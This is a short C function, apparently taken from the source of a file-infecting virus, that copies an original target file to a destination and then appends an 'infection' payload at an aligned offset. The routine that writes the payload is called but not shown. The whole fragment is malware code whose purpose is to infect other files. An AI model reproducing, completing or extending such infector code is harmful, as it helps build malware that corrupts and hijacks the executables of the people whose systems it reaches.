bool target_copy_and_infect(Target* t)
{
  write(t->fd_dst, t->p.b, t->filesize); /* original target */
  lseek(t->fd_dst, t->aligned_filesize, SEEK_SET);

  fprintf(stderr, "wrote %u bytes, ", target_write_infection(t));
  return true;
}
